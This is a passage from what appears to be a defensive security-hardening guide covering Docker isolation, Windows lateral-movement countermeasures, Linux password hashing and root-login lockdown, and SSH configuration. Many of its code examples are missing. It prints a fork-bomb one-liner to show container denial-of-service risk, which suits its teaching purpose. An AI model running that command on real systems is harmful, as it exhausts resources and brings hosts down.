: (Process ID) Provides process isolation, separates container processes from host and other container processes.
The first process that is created in a new PID
namespace is the “init” process with PID
1, which assumes parenthood of the other processes within the same PID
namespace. When PID
1 is terminated, so are the rest of the processes within the same PID
namespace.
PID
namespaces are hierarchically nested in ancestor-descendant relationships to a depth of up to 32 levels. All PID
namespaces have a parent namespace, other than the initial root PID
namespace of the host system. That parent namespace is the PID
namespace of the process that created the child namespace.
Within a PID
namespace, it is possible to access (make system calls to specific PID
s) all other processes in the same namespace, as well as all processes of descendant namespaces, however processes in a child PID
namespace cannot see processes that exist in the parent PID
namespace or further removed ancestor namespaces. The direction any process can access another process in an ancestor/descendant PID
namespace is one way.
Processes in different PID
namespaces can have the same PID
, because the PID
namespace isolates the PID
number space from other PID
namespaces.
Docker takes advantage of PID
namespaces. Just as you would expect, a Docker container can not access the host system processes, and process ids that are used in the host system can be reused in the container, including PID
1, by being reassigned to a process started within the container. The host system can however access all processes within its containers, because as stated above, PID
namespaces are hierarchically nested in parent-child relationships, so processes in the hosts PID
namespace can access all processes in their own namespace down to the PID
namespace that was responsible for starting the process, that is the process within the container in our case.
The default behaviour can however be overridden to allow a container to be able to access processes within a sibling container, or the hosts PID
namespace. Example:
As an aside, PID
namespaces give us the functionality of: “suspending/resuming the set of processes in the container and migrating the container to a new host while the processes inside the container maintain the same PIDs.” with a handful of commands:
net
: (Networking) Provides network isolation by managing the network stack and interfaces. Also essential to allow containers to communicate with the host system and other containers. Network namespaces were introduced into the kernel in 2.6.24, January 2008, with an additional year of development they were considered largely done. The only real concern here is understanding the Docker network modes and communication between containers. This is discussed in the Countermeasures. UTS
: (Unix Timesharing System) Provides isolation of kernel and version identifiers.
UTS is the sharing of a computing resource with many users, a concept introduced in the 1960s/1970s.
A UTS namespace is the set of identifiers returned by uname
, which include the hostname and the NIS domainname. Any processes which are not children of the process that requested the clone will not be able to see any changes made to the identifiers of the UTS namespace.
If the CLONE_NEWUTS
constant is set, then the process being created will be created in a new UTS namespace with the hostname and NIS domain name copied and able to be modified independently from the UTS namespace of the calling process.
If the CLONE_NEWUTS
constant is not set, then the process being created will be created in the same UTS namespace of the calling process, thus able to change the identifiers returned by uname
.
When a container is created, a UTS namespace is copied (CLONE_NEWUTS
is set)(--uts=""
) by default, providing a UTS namespace that can be modified independently from the target UTS namespece it was copied from.
When a container is created with --uts="host"
, a UTS namespace is inherited from the host, the --hostname
flag is invalid.
IPC
: (InterProcess Communication) manages access to InterProcess Communications). IPC
namespaces isolate your container’s System V IPC and POSIX message queues, semaphores, and named shared memory from those of the host and other containers, unless another container specifies on run that it wants to share your namespace. It would be a lot safer if the producer could specify which consuming containers could use its namespace. IPC namespaces do not include IPC mechanisms that use filesystem resources such as named pipes.
According to the namespaces man page: “Objects created in an IPC namespace are visible to all other processes that are members of that namespace, but are not visible to processes in other IPC namespaces.”
Although sharing memory segments between processes provide Inter-Process Communications at memory speed, rather than through pipes or worse, the network stack, this produces a significant security concern.
By default a container does not share the hosts or any other containers IPC namespace. This behaviour can be overridden to allow a (any) container to reuse another containers or the hosts message queues, semaphores, and shared memory via their IPC namespace. Example:
Now find the Ids of the two running containers:
Now you can see using the command supplied from the CIS_Docker_1.13.0_Benchmark that container-consumer
is using the IPC namespace of container-producer
:
When the last process in an IPC namespace terminates, the namespace will be destroyed along with all IPC objects in the namespace.
user
: Not enabled by default. Allows a process within a container to have a unique range of user and group Ids within the container, known as the subordinate user and group Id feature in the Linux kernel, that do not map to the same user and group Ids of the host, container users to host users are remapped. So for example, if a user within a container is root, which it is by default unless a specific user is defined in the image hierarchy, it will be mapped to a non-privileged user on the host system.When a container is started with docker run
without specifying a cgroup parent, as well as creating the namespaces discussed above, Docker also creates a Control Group (or cgroup) with a set of system resource hierarchies, nested under the default parent docker
cgroup, also created at container runtime if not already present. You can see how this hierarchy looks in the /sys/fs/cgroup
pseudo-filesystem in the Countermeasures section. Cgroups have been available in the Linux kernel since January 2008 (2.6.24), and have continued to be improved. Cgroups track, provide the ability to monitor, and configure fine-grained limitations on how much of any resource a set of processes, or in the case of Docker or pure LXC, any given container can use, such as CPU, memory, disk I/O, and network. Many aspects of these resources can be controlled, but by default, any given container can use all of the systems resources, allowing potential DoS.
Fork Bomb from Container
If an attacker gains access to a container or in a multi-tenanted scenario where being able to run a container by an arbitrary entity is expected, by default, there is nothing stopping a fork bomb
:(){:|:&};:
launched in a container from bringing the host system down. This is because by default there is no limit to the number of processes a container can run.
According to the Linux man page for capabilities, “Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled” this is on a per thread basis. So root with all capabilities has privileges to do everything. According to the man page, there are currently 38 capabilities.
By default, the following capabilities are available to the default user of root within a container, check the man page for the full descriptions of the capabilities. The very knowledgeable Dan Walsh who is one of the experts when it comes to applying least privilege to containers, also discusses these: chown
, dac_override
, fowner
, fsetid
, kill
, setgid
, setuid
, setpcap
, net_bind_service
, net_raw
, sys_chroot
, mknod
, audit_write
, setfcap
. net_bind_service
for example allows the superuser to bind a socket to a privileged port <1024 if enabled. The Open Container Initiative (OCI) runC specification is considerably more restrictive only enabling three capabilities: audit_write
, kill
, net_bind_service
As stated on the Docker Engine security page: “One primary risk with running Docker containers is that the default set of capabilities and mounts given to a container may provide incomplete isolation, either independently, or when used in combination with kernel vulnerabilities.”
A little history to start with: In the early 1990s, Linux was developed as a clone of the Unix Operating system. The core Unix security model which is a form of Discretionary Access Control (DAC) was inherited by Linux. I have provided a glimpse of some of the Linux kernel security features that have been developed since the inception of Linux. The Unix DAC remains at the core of Linux. The Unix DAC allows a subject and/or group of an identity to set the security policy for a specific object, the canonical example being a file, and having a user set the different permissions on who can do what with it. The Unix DAC was designed in 1969, and a lot has changed since then.
Capabilities may or not be to course grained, get an understanding of both capabilities and Linux Security Modules (LSMs). Many of the DACs can be circumvented by users. Finer grained control is often required along with Mandatory Access Control (MAC).
Secure Computing Mode (SecComp) is a security facility that reduces the attack surface of the Linux kernel by reducing the number of System calls that can be made by a process. Any System calls made by the process outside of the defined set will cause the kernel to terminate the process with SIGKILL
. By doing this, the SecComp facility stops a process from accessing the kernel APIs via System calls.
The first version of SecComp was merged into the Linux kernel mainline in version 2.6.12 (March 8 2005). If enabled for a given process, only four System calls could be made: read()
, write()
, exit()
, and sigreturn()
, thus significantly reducing the kernels attack surface.
In order to enable SecComp for a given process, you would write a 1
to /proc/<PID>/seccomp
. This would cause the one-way transition into the restrictive state.
There has been a few revisions, since 2005, like with the “seccomp filter mode” being added, which allowed processes to specify which System calls were allowed. Then the addition of the seccomp()
System call in 2014 to the kernel version 3.17. Along with popular applications such as Chrome/Chromium, OpenSSH, Docker uses SecComp to reduce the attack surface on the kernel APIs.
Docker has disabled about 44 system calls in its default (seccomp) container profile (default.json) out of well over 300 available in the Linux kernel. Docker calls this “moderately protective while providing wide application compatibility”. It appears that ease of use is the first priority. Again, plenty of opportunity here for reducing the attack surface on the kernel APIs, for example the keyctl
System call was removed from the default Docker container profile after vulnerability CVE-2016-0728 was discovered, which allows privilege escalation or denial of service. CVE-2014-3153 is another vulnerability accessible from the futex
System call which is white listed in the default Docker profile.
If you are looking to attack the Linux kernel via its APIs from a Docker container, you have still got plenty of surface area here to play with.
In order to set-up read-only hosts, physical or VM, there is a lot of work to be done, and in some cases, it becomes challenging to stop an Operating System writing to some files. Remember back to how much work was involved in Partitioning on OS Installation and Lock Down the Mounting of Partitions. In contrast, running Docker containers as read-only is trivial. Check the Countermeasures section.
Application security is still our biggest weakness. I cover this in many other places, and especially in the Web Applications chapter.
This is exactly what your attackers rely on you doing. Not upgrading out of date software. This is the same concept as discussed in the Web Applications chapter under “Consuming Free and Open Source”. Just do not do it. Stay patched.
There is not a lot to say here, other than make sure you do this. I have personally seen so many disasters that could have been avoided if timely / regular backups had of been implemented and tested routinely. I have seen many situations where backup schedules were in place, but they had not been tested for a period of time, and when it came time to use them, they were not available for various reasons. When your infrastructure gets owned, don’t be the one that can not roll back to a good known state.
Now this is addressed, because so many rely on firewalls to hide many weak areas of defence. The lack of a firewall if your services and communications between them are hardened does not have to be an issue, in-fact I see it as a goal many of us should have, as it forces us to build better layers of defence.
Revisit the Countermeasures subsection of the first chapter of Fascicle 0.
The following resources are also worth reviewing:
Bringing your VPS(s) in-house provides all the flexibility/power required to mitigate just about all the risks due to outsourcing to a cloud or hosting provider. How easy this will be is determined by how much you already have invested. Cloud offerings are often more expensive in monetary terms for medium to large environments, so as you grow, the cost benefits you may have gained due to quick development up-front will often become an anchor holding you back. Because you may have bought into their proprietary way of doing things, it now becomes costly to migrate, and your younger competitors which can turn quicker, out manoeuvre you. Platform as a Service and serverless technologies often appear even more attractive, but everything comes at a cost, cloud platforms may look good to start with, but often they are to good, and the costs will catch up with you. All that glitters is not gold.
Defence in depth will help here, the attacker should not be in possession of your admin passwords or hashes. If this has already happened, how did it happen? Take the necessary steps to make sure it does not happen again.
Samba is not usually installed on Linux by default, but as we are dealing with Windows here, you do not have the option of whether SMB is installed and running on your machines.
Check the list of requirements for PsExec and turn of / disable what you can.
Try and re-exploit with the provided directions in the Identify Risks section.
Restrict administrative accounts as much as possible, especially network administrator accounts. All users should have the least amount of privilege necessary in order to do their jobs and elevate only when needed. This is why most Linux distributions use sudo.
Consider multi-factor authentication methods for administrators.
How exposed are administrators machines? Can they be put on a less exposed network segment?
In a Windows network, those that are the most likely to be exploited are administrators. Pay special attention to them and their machines. For example, if an attacker uses the current_user_psexec
module, then once they have access to an administrators machine, traversal to other machines like Domain Controllers is trivial if the administrators current login context allows them to access the Domain Controller. Make sure the administrators are aware of this and that they only elevate privileges when it is required and not on their own machines.
Network Intrusion Detection Systems (NIDS) will more than likely not be able to detect the actual passing of the administrators credentials to the target system, because that is how the legitimate SysInternals PsExec behaves, but what a NIDS can be configured to watch for is what happens when the attackers payload executes, for example, it is not normally legitimate behaviour for reverse shells to be sent over the network. Host Intrusion Detection Systems (HIDS) can of course detect the presence of additional and modified files, although these are less commonly run on desktop computers.
Upgrade PowerShell to the latest version.
As above, NIDS can help here, Often these attacks do not leave any files on the disk. Next Generation AV products are slowly coming to the market, such as those that use machine learning. Most of the products I have seen so far are very expensive though, this should change in time.
Deep Script Block Logging can be enabled from PowerShell v5 onwards. This option tells PowerShell to record the content of all script blocks that it processes, we rely heavily on script blocks with PowerShell attacks. Script Block Logging includes recording of dynamic code generation and provides insight into all the script-based activity on the system, including scripts that are encoded to evade anti-virus, and understanding of observation from human eyes. Applies to any application that hosts PowerShell engine, CLI, ISE.
Script Block Logging records and logs the original obfuscated (XOR, Base64, encryption, etc) script, transcripts, and de-obfuscated code.
Run gpedit.msc -> opens Local Group Policy Editor -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn On PowerShell Script Block Logging -> Check the “Enabled box”. By default, each script block is only logged the first time it is run. You can also check the “Log script block invocation start / stop events” check box if you want to log start and stop events for every time any script block is invoked. The second option can produce very large amounts of log events though.
This setting may also be accessible from the registry:
Set EnableScriptBlockLogging = 1
at
HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
or
HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
I am hoping this goes without saying, unless you are setting up a Windows server with “all the stuff” that you have little control over its hardening process, which is why I favour UNIX based servers. I/You have all the control, if anything goes wrong, it will usually be our own fault for missing or neglecting something. The less you have on your servers, the fewer servers you have, the smaller the network you have, the less employees you have, basically the smaller and lesser of everything you have, the less there is to compromise by an attacker and the quicker you can move.
Much of this section came from a web server I set-up, from install and through the hardening process.
There are often a few services you can disable even on a bare bones Debian install and some that are just easier to remove. Then go through the process of hardening what is left. Make sure you test before and after each service you disable, remove or harden, watch the port being opened/closed, etc. Remember, the less you have, the less there is to be exploited.
By creating many partitions and applying the least privileges necessary to each in order to be useful, you are making it difficult for an attacker to carry out many malicious activities that they would otherwise be able to.
This is a similar concept to tightly constraining input fields to only be able to accept structured data (names (alpha only), dates, social security numbers, zip codes, email addresses, etc) rather than just leaving the input wide open to be able to enter any text as discussed in the Web Applications chapter under What is Validation.
The way I’d usually set-up a web servers partitions is as follows. Delete all the current partitions and add the following. /
was added to the start and the rest to the end, in the following order: /
, /var/log
(optional, but recommended), /var/tmp
(optional, but recommended), /var
, /tmp
, /opt
, /usr/share
(optional, but recommended), /usr
, /home
, swap
.
You will notice in the Lock Down the Mounting of Partitions section, that I ended up adding additional partitions (mentioned in the previous paragraph) to apply finer grained control on directories often targeted by attackers. It is easier to add those partitions here, we will add options to them in the Lock Down section.
If you add the “optional, but recommended” partitions, then they may look more like the following after a df -h
:
The sizes should be set-up according to your needs. If you have plenty of RAM, make your swap
small, if you have minimal RAM (barely (if) sufficient), you could double the RAM size for your swap
. It is usually a good idea to think about what mount options you want to use for your specific directories. This may shape how you set-up your partitions. For example, you may want to have options nosuid
,noexec
on /var
but you can’t because there are shell scripts in /var/lib/dpkg/info
so you could set-up four partitions. /var
without nosuid
,noexec
and /var/tmp
, /var/log
, /var/account
with nosuid
,noexec
. Look ahead to the Mounting of Partitions section for more details, or just wait until you get to it.
You can think about changing /opt
(static data) to mount read-only in the future as another security measure if you like.
If you want to:
I recommend using apt-cacher-ng, installable with an apt-get
, you will have to set this up on a server, by modifying the /var/apt-cacher-ng/acng.conf
file to suite your environment. There is ample documentation. Then add the following file to each of your debian based machines.
/etc/apt/apt.conf
with the following contents and set its permissions to be the same as your sources.list:
Now just replace the apt proxy references in the /etc/apt/sources.list
of your consuming servers with the internet mirror you want to use, so we contain all the proxy related config in one line in one file. This will allow the requests to be proxied and packages cached via the apt cache on your network when requests are made to the mirror of your choosing.
Update the list of packages then upgrade them with the following command line. If you are using sudo, you will need to add that to each command:
Now if you’re working through an installation, you’ll be asked for a mirror to pull packages from. If you have the above apt caching server set-up on your network, this is a good time to make it work for you. You’ll just need to enter the caching servers IP address and port.
A lot of the following you will have to follow along with on your VPS in order to understand what I am saying.
Make sure passwords are encrypted with an algorithm that will stand up to the types of attacks and hardware you anticipate that your attackers will use. I have provided additional details around which Key Derivation Functions are best suited to which types of hardware in the “Which KDF to use” section within the Web Applications chapter.
In most cases you will want to shadow your passwords. This should be the default in most, or all recent Linux distributions.
How do you know if you already have the Shadow Suite installed? If you have a /etc/shadow
file, take a look at the file and you should see your user and any others with an encrypted value following it. There will be a reference to the password from the /etc/passwd
file, stored as a single X
(discussed below). If the Shadow Suite is not installed, then your passwords are probably stored in the /etc/passwd
file.
Crypt, crypt 3 or crypt(3) is the Unix C library function designed for password authentication. The following table shows which Operating Systems have support out of the box and with which hashing functions or key derivation functions are supported. We discuss this table in a moment, so don’t worry just yet if you do not understand it all:
It may be worth looking at and modifying the /etc/shadow
file. Consider changing the “maximum password age” and “password warning period”. Consult the man page for shadow for full details. Check that you are happy with which encryption algorithms are currently being used. The files you will need to look at are: /etc/shadow
and /etc/pam.d/common-password
. The man pages you will probably need to read in conjunction with each other are the following:
Out of the box crypt (glibc) supports MD5, SHA-256 and SHA-512, I wouldn’t bother looking at DES, and MD5 is common but weak. You can also use the blowfish cipher via the bcrypt KDF with a little more work (a few minutes). The default of SHA-512 (in debian) enables salted passwords. The SHA family of hashing functions are to fast for password hashing. Crypt applies key stretching to slow brute-force cracking attempts down. The default number of rounds have not changed in at least 9 years, so it is well worth modifying the number to keep up with hardware advancements. There are some details to work out what the factor should be, provided by OWASP in the MembershipReboot section in the Web Applications chapter. The default number of rounds are as follows:
The OWASP advice says we should double the rounds every subsequent two years. So for the likes of SHA in 2007 having 5000 rounds, we should be looking at increasing this to 160000
in the year 2017, so if you are still with the default, you are a long way behind and it is time to do some serious key stretching.
How can you tell which algorithm you are using, salt size, number of iterations for the computed password, etc? The crypt 3 man page explains it all. By default a Debian install will be using SHA-512 which is better than MD5 and the smaller SHA-256. Don’t take my word for it though, just have a look at the /etc/shadow
file. I explain the file format below.
Now by default I did not have a “rounds” option in my /etc/pam.d/common-password
module-arguments. Having a large iteration count (number of times the encryption algorithm is run (key stretching)) and an attacker not knowing what that number is, will slow down a brute-force attack.
You can increase the rounds
by overriding the default in /etc/pam.d/common-passwowrd
. You override the default by adding the rounds field and the value you want to use, as seen below.
Next time someone changes their password (providing the account is local), [number of rounds]
number of rounds
will be used.
I would suggest adding this and re creating your passwords now. Just before you do, it is usually a good idea to be logged in at an extra terminal and possibly a root terminal as well, until you are sure you can log in again. It just makes things easier if for what ever reason you can no longer log in at a new terminal. Now… as your normal user run:
passwd
providing your existing password then your new one twice. You should now be able to see your password in the /etc/shadow
file with the added rounds
parameter.
Also have a check in /var/log/auth.log
. Reboot and check you can still log in as your normal user. If all good. Do the same with the root account.
Let’s have a look at the passwd
and shadow
file formats.
:
is a separator in both /etc/shadow
and /etc/passwd
files:
you
is the Account username$id$salt$hashedpassword
is generally considered to be called the encrypted password, although this is made up of three base fields separated by the $
. The id
can be any of the Scheme ids that crypt supports, as shown in the above table. How the rest of the substrings in this field are interpreted is determined by what is found in the id
field. The salt can be up to 16 characters. In saying that, the salt can be augmented by prepending the rounds=<number of rounds, sourced from /etc/pam.d/common-password>$
directive.The hashed part of the password string is the actual computed password. The size of this string is fixed as per the below table:
The rest of the fields are as per below.
daemon
is the account username*
is the place where the salt and hashed password would go, the asterisk means that this account can not be used to log in.15980
is the number of days from the Unix “epoch” (1970-1-1) to when the password was changed.0
is the minimum password age or number of days that the user will have to wait before they will be allowed to change their password. An empty field or 0
means that there is no minimum.99999
is the maximum number of days until the user will be forced to change their password. 99999
or an empty value means that there is no limit to the maximum age that the password should be changed. If the maximum password age is lower than the minimum password age (No. 4) the user can not change their password.7
is the password warning period. An empty value or 0
means that there is no warning period.The format of the /etc/passwd
file is as follows:
root
and you
are the account usernamesx
is the placeholder for password information. The password is obtained from the /etc/shadow
file.0
or 1000
is the user Id, the root user always has an Id of 0
.0
or 1000
is the primary group Id for the user, the root user always has a primary group Id of 0
.root
or you,,,
is the comment field. This field can be used to describe the user or user’s function. This could be used for contact details, or maybe what the account is used for./root
or /home/you
is the users home directory. For regular users, this would usually be /home/[you]
. For root, this is /root
./bin/bash
is the users default shell.You should find this fairly straight forward on a Debian server. In order to use bcrypt with slowpoke blowfish which is the best (very slow) algorithm available for hashing passwords currently, which is obvious by the number of iterations applied by default as noted above, 64 rounds as opposed to MD5
s 1000 rounds, and SHA
s 5000 rounds from 2007.
/etc/pam.d/
, and change all references to pam_unix.so
to pam_unix2.so
in the following files:sha512
) with blowfish
Passwords that are updated after these modifications are made will be computed using blowfish. Existing shadow passwords are not modified until you change them. So you need to change them immediately (one at a time to start with please. Leave root till last) if you expect them to be using the bcrypt KDF. Do this the same way we did above with the passwd
command.
Something to be aware of: If the version of libpam-unix2 that you just installed does not support the existing crypt scheme used to create an existing users password, that user may not be able to log in. You can get around this by having root create a new password for that user, because passwd
will not ask root for that users existing password.
Consider setting a password for GRUB, especially if your server is directly on physical hardware. If it is on a hypervisor, an attacker has another layer to go through before they can access the guests boot screen.
There are a handful of files to check and/or modify in terms of disabling root logins.
/etc/pam.d/login
pam_securetty.so
module. When this file along with the next one is properly configured, when root tries to login on an insecure console (that’s one that is not listed in the next file), they will not be prompted for a password and will instead receive a message like the following:pam_securetty(login:auth): access denied: tty '/dev/tty1' is not secure :
Login incorrect
nullok
text removed from it:auth required pam_unix.so nullok
/etc/inittab
. A better practise is to only allow low privilege users access to terminals and then elevate privileges once logged in:auth requisite pam_securetty.so
/etc/securetty
cat /dev/null > /etc/securetty
/etc/inittab
/etc/security/access.conf
pam_access
module and make modifications to this file. Currently everything is commented out by default. Enabling this module and configuring it, allows for finer grained access control, but log messages are lacking. I usually don’t touch this module.Now test that you are unable to log into any of the text terminals (TeleTYpewriter, tty) listed in /etc/inittab
. Usually these can be accessed by [Ctrl]+[Alt]+[F[1, 2, 3, …]] if you are dealing with a physical machine. If you are dealing with a hypervisor, attempt to log-in to the guests console via the hypervisor management UI as root, in the case of VMware ESX(i) vSphere. You should no longer be able to.
Make sure that if your server is not physical hardware, but is a VM, then the hosts password is long and consists of a random mix of upper case, lower case, numbers, and special characters.
We covered fingerprinting of SSH under the Reconnaissance section of the Processes and Practises chapter in Fascicle 0. Here we will discuss:
First of all, make sure you are using SSH version 2. Version 1 and its progressions have well documented known vulnerabilities. Version 2 has none at the time of writing this. You can confirm this in multiple ways. The two simplest techniques are as follows:
Protocol
field of /etc/ssh/sshd_config
on your server, it should say 2
, as in Protocol 2
ssh -1 you@your_server
Protocol major versions differ: 1 vs. 2
ssh -2 you@your_server
Often refereed to as “secret key” or “shared secret” encryption. In the case of Symmetrical encryption, typically only a single key is required for both ends of the communication, or a pair of keys in which a simple transformation is required to establish the relationship between them (not to be confused with how Diffie-Hellman (asymmetric) parties establish their secret keys). The single key should be kept secret by the parties involved in the conversation. This key can be used to both encrypt and decrypt messages.
Some of the commonly used and well known ciphers used for this purpose are the following:
The algorithm selected to be used for encrypting the connection is decided by both the client and server, both must support the chosen cipher. Each is configured to work their way through a list from most preferred to least preferred. Entering man ssh_config
into a terminal will show you the default order for your distribution.
Also known as public-key or key-pair encryption, utilises a pair of keys, one which is public and one which by design is to be kept private. You will see where this is used below when we set-up the SSH connection. Below are the most commonly used public-key algorithms:
Also known as message digests and one-way encryption algorithms. Hash functions create a fixed-length hash value based on the plain-text. Hash functions are often used to determine the integrity of a file, message, or any other data.
If a given hash function is run on a given message twice, the resulting hash value should be identical. Modifying any part of the message has a very high chance of creating an entirely different hash value.
Any given message should not be able to be re-created from the hash of it.
When the symmetric encryption negotiation is being carried out, a Message Authentication Code (MAC) algorithm is selected from the clients default list of MAC’s, the first one that is supported on the server is used. You can see the default list by entering man ssh_config
into a terminal.
Once the encryption properties are chosen as detailed below in the first step of SSH Connection Procedure, each message sent must contain a MAC, so that the receiving party can verify the integrity of the message. The MAC is the result of:
The MAC is sent as the last part of the binary packet protocol.
The two main stages of establishing the connection are:
The following are the details for each:
Establish the session encryption
The SSH client is responsible for initiating the TCP handshake with the server. The server responds with the protocol versions it supports, if the client can support one of the protocol versions from the server, the process continues. The server also provides its public (asymmetric) host key. The client verifies that the server is known to it, by checking that the public host key sent from the server is in the clients:
~/.ssh/known_hosts
This record is added on first connection to the server, as detailed in the section “Establishing your SSH Servers Key Fingerprint” below.
At this stage, a session key is negotiated between the client and server using Diffie-Hellman (DH) as an ephemeral (asymmetric) key exchange algorithm, each combining their own private data with public data from the other party, which allows both parties to arrive at the identical secret symmetric session key. The public and private key pairs used to create the shared secret key in this stage have nothing to do with the client authenticating to the server.
Now in a little more detail, the Diffie-Hellman key agreement works like this:
Authenticate the client to the server
The second stage is to authenticate the client, establishing whether they should be communicating with the server. There are several methods for doing this, the two most common are passwords and key-pair. SSH defaults to passwords, as the lowest common denominator, plus it often helps to have password authentication set-up in order to set-up key-pair authentication, especially if you don’t have physical access to the server(s).
SSH key pairs are asymmetric. The server holds the clients public key and is used by the server to encrypt messages that it uses to authenticate the client. The client in turn receives the messages from the server and decrypts them with the private key. If the public key falls into the wrong hands, it’s no big deal, because the private key can not be deduced from the public key, and all the authentication public key is used for is verifying that the client holds the private key for it.
The authentication stage continues directly after the encryption has been established from the previous step.
~/.ssh/authorized_keys
file for the Id of the public keys account that the client is authenticating as~/.ssh/authorized_keys
, the server creates a random number and encrypts it with the public key that had a matching IdBelow in the Key-pair Authentication section, we work through manually (hands on) setting up Key-pair authentication.
When you connect to a remote host via SSH that you have not established a trust relationship with before, you are going to be told that the authenticity of the host your attempting to connect to can not be established.
Do you type yes to continue without actually knowing that it is the host you think it is? Well, if you do, you should be more careful. The fingerprint that is being put in front of you could be from a Man In the Middle (MItM). You can query the target (from “its” shell of course) for the fingerprint of its key easily. On Debian you will find the keys in /etc/ssh/
When you enter the following:
ls /etc/ssh/
you should get a listing that reveals the private and public keys. Run the following command on the appropriate key to reveal its fingerprint.
For example if SSH is using rsa:
ssh-keygen -lf ssh_host_rsa_key.pub
For example if SSH is using dsa:
ssh-keygen -lf ssh_host_dsa_key.pub
If you try the command on either the private or publick key you will be given the public keys fingerprint, which is exactly what you need for verifying the authenticity from the client side.
Sometimes you may need to force the output of the fingerprint_hash algorithm, as ssh-keygen may be displaying it in a different form than it is shown when you try to SSH for the first time. The default when using ssh-keygen to show the key fingerprint is sha256, unless it is an old version, but in order to compare apples with apples you may need to specify md5 if that is what is being shown when you attempt to login. You would do that by issuing the following command:
ssh-keygen -lE md5 -f ssh_host_dsa_key.pub
If that does not work, you can specify md5 from the client side with:
ssh -o FingerprintHash=md5 <your_server>
Alternatively this can be specified in the clients ~/.ssh/config
file as per the following, but I would not recommend this, as using md5 is less secure.
Prior to OpenSSH 6.8 The fingerprint was provided as a hexadecimal md5 hash. Now it is displayed as base64 sha256 by default. You can check which version of SSH you are using with:
You can find additional details on the man pages for the options, both ssh-keygen and ssh.
Do not connect remotely and then run the above command, as the machine you are connected to is still untrusted. The command could be dishing you up any string replacement if it is an attackers machine. You need to run the command on the physical box or get someone you trust (your network admin) to do this and hand you the fingerprint.
Now when you try to establish your SSH connection for the first time, you can check that the remote host is actually the host you think it is by comparing the output of one of the previous commands with what SSH on your client is telling you the remote hosts fingerprint is. If it is different, it is time to start tracking down the origin of the host masquerading as the address your trying to log in to.
Now, when you get the following message when attempting to SSH to your server, due to something or somebody changing the hosts key fingerprint:
The same applies. Check that the fingerprint is indeed the intended target hosts key fingerprint. If it is, you can continue to log in.
Now when you type yes
, the fingerprint is added to your clients:
/home/you/.ssh/known_hosts
file,
so that next time you try and login via SSH, your client will already know your server.
There are a bunch of things you can do to minimise SSH being used as an attack vector. Let us walk through some now.
After any changes, restart SSH daemon as root (using sudo) to apply the changes.
You can check the status of the daemon with the following command:
Configuring which hosts can access your server
This can be done with a firewall, or at a lower level which I prefer. The two files you need to know about are: /etc/hosts.deny
and /etc/hosts.allow
. The names of the files explain what they contain. hosts.deny
contains addresses of hosts which are blocked, hosts.allow
contains addresses of hosts which are allowed to connect.
If you wanted to allow access to the SSH daemon from 1.1.1.x
and 10.0.0.5
, but no others, you would set-up the files like the following:
If you wanted to deny all only to SSH, so that users not listed in hosts.allow
could potentially log into other services. you would set the hosts.deny
up like the following:
There are also commented examples in the above files and check the man page for all of the details.
Changes to the servers /etc/ssh/sshd_config
file
To tighten security up considerably Make the necessary changes to your servers:
/etc/ssh/sshd_config
file.
Start with the changes I list here. When you change things like setting up AllowUsers
or any other potential changes that could lock you out of the server. It is a good idea to be logged in via one shell when you exit another and test it. This way if you have locked yourself out, you will still be logged in on one shell to adjust the changes you have made. Unless you have a need for multiple users, you can lock it down to a single user. You can even lock it down to a single user from a specific host.
As you can see, these changes are very simple, but so many do not do it. Every positive security change you make to the low hanging fruit lifts it that little bit higher for the attacker to reach, making it less economical for them.
You can also consider installing and configuring denyhosts
Check SSH login attempts. As root or via sudo, type the following to see all failed login attempts:
If you want to see successful logins, enter the following:
If you are sending your logs off-site in real-time, it will not matter to much if the attacker tries to cover their tracks by modifying these types of files. If you are checking the integrity of your system files frequently with one of the Host Intrusion Detection Systems (HIDS) we discuss a little further on in this chapter, then you will know you are under attack and will be able to take measures quickly, providing you have someone engaged watching out for these attacks, as discussed in the People chapter of Fascicle 0. If your HIDS is on the same machine that is under attack, then it is quite likely that any decent attacker is going to find it before they start modifying files and some-how render it ineffective. That is where Stealth shines, as it is so much harder to find where it is operating from, if the attacker even knows it is.
Key-pair Authentication
The details around how the client authenticates to the server are above in part 2 of the SSH Connection Procedure section. This section shows you how to set-up key-pair authentication, as opposed to password authentication.
Make sure you use a long pass-phrase (this is your second factor of authentication) for your key-pair, that you store in a password vault with all your other passwords. You are using a decent password vault right? If your pass-phrase and private key is compromised, your hardening effort will be softened or compromised.
My feeling after a lot of reading is that currently RSA with large keys (The default RSA size is 2048 bits) is a good option for key-pair authentication. Personally I like to go for 4096 these days.
Create your key-pair if you have not already and set-up key-pair authentication. Key-pair auth is more secure and allows you to log in without a password. Your pass-phrase should be stored in your keyring. You will just need to provide your local password once (each time you log into your local machine) when the keyring prompts for it.
On your client machine that you want to create the key-pair and store them:
Agree to the location that ssh-keygen
wants to store the keys… /home/you/.ssh
Enter a pass phrase twice to confirm. Keys are now in /home/you/.ssh
Optionally, the new private key can be added to id_rsa.keystore
if it hasn’t been already:
Then enter your pass-phrase.
Now we need to get the public key we have just created (~/.ssh/id_rsa.pub
) from our client machine into our servers ~/.ssh/
directory.
You can scp
it, but this means also logging into the server and creating the:
~/.ssh/authorized_keys
file if it does not already exist,
and appending (>>
) the contents of id_rsa.pub to ~/.ssh/authorized_keys
. There is an easier way, and it goes like this, from your client machine:
This will copy the public key straight into the ~/.ssh/authorized_keys
file on your_server. You may be prompted to type yes
if it is the first time you have connected to the server, that the authenticity of the server you are trying to connect to can not be established and you want to continue. Remember I mentioned this above in the Establishing your SSH Servers Key Fingerprint section? Make sure you check the servers Key Fingerprint and do not just blindly accept it, this is where our security solutions break down… due to human defects.
Also make sure the following permissions and ownership on the server are correct:
You may need to tunnel SSH once the server is placed into the DMZ. Usually this will be mostly set-up on your router. If you are on the outside of your network, you will just SSH to your external IP address.
If you are wanting to SSH from your LAN host to your DMZ web server:
Before you try that though, you will need to set-up the port forwards and add the WAN and/or LAN rule to your router. How you do this will depend on what you are using for a router.
I have blogged extensively over the years on SSH. The Additional Resources chapter has links to my resources for a plethora of information on configuring and using SSH in many different ways.
sshuttle
I just thought I would throw sshuttle in here as well, it has nothing to do with hardening SSH, but it is a very useful tool for tunneling SSH. Think of it as a poor mans VPN, but it does some things better than the likes of OpenVPN, like forcing DNS queries through the tunnel also. It is very simple to run.
As opposed to manually specifying socks and then having to tell your browser to proxy through localhost
and use the same port you defined after the socks (-D
) option, and then having to do the same for any other programmes that want to use the same tunnel:
